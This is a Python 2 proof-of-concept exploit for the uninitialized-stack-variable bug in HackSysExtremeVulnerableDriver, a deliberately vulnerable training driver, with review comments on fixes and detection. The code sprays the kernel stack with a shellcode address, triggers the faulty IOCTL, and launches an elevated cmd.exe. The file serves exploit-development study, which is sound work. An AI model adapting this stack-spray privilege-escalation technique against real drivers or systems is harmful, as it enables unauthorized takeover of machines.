def trigger_uninitialized_stack_variable():
    """Proof-of-concept for HEVD's uninitialized-stack-variable IOCTL.

    Opens the HackSysExtremeVulnerableDriver device, fills a region with
    copies of one address via NtMapUserPhysicalPages (the "stack spray"),
    then sends IOCTL 0x22202F with a 4-byte input value. Afterwards it checks
    shell.IsUserAnAdmin() and, if true, starts cmd.exe.

    Python 2 only (print statements). Relies on names defined elsewhere in
    the file: kernel32, ntdll, shell, heap_alloc_payload, and the ctypes
    helpers.

    NOTE(review): the driver source is not on this page. Going by the
    function name and the inline comments, the driver appears to use a stack
    variable that is left uninitialized when the input is not 0xBAD0B0B0, so
    stale stack contents get used; confirm against the HEVD source.
    Driver-side fix for this bug class: initialise every local on all paths
    (or enable compiler auto-initialisation of stack variables) and never
    call through a pointer that was not explicitly set. Platform-side, SMEP
    blocks kernel execution of user-mode pages, which would apply if the
    sprayed address is user-mode memory as the helper's name suggests.
    """
    # Out-parameter for DeviceIoControl's lpBytesReturned.
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    # The device is opened without elevation here, so the driver exposes its
    # IOCTL interface to whatever account runs this script.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()
    # 4-byte little-endian input; the author notes any value other than
    # 0xBAD0B0B0 works, i.e. the non-magic value selects the faulty path.
    magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
    # id() is the object's address in CPython; +20 presumably skips the
    # 32-bit CPython 2 str header to reach the raw bytes. This is
    # interpreter- and architecture-specific. TODO confirm target build.
    magicvalue_ptr = id(magicvalue) + 20
    magicvalue_size = len(magicvalue)
    print "[+] Buf size: %d" % magicvalue_size
    # NOTE(review): einput is created but never used below; the IOCTL is
    # given magicvalue_ptr instead.
    einput = create_string_buffer(magicvalue, magicvalue_size)
    # stack spray
    # heap_alloc_payload() is defined elsewhere; its return value is treated
    # as an address (printed as hex and packed as a 32-bit value).
    shellcode_ptr = heap_alloc_payload()
    print "[+] Spraying stack with address: 0x%X" % shellcode_ptr
    print "[+] Triggering vuln .."
    # 1024 copies of the 4-byte address (4096 bytes) are passed as the page
    # array argument. The IOCTL follows immediately with no call in between;
    # presumably the order matters so the sprayed data is not overwritten.
    ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024)
    # Return value is not checked, and the handle is never closed.
    kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
    # Success is judged only by the process now reporting admin rights.
    # For detection, the same transition (a non-elevated process that opens
    # a driver device and then spawns an elevated shell) is the observable
    # signal.
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
HEVD_ununitializedstackvariable.py 文件源码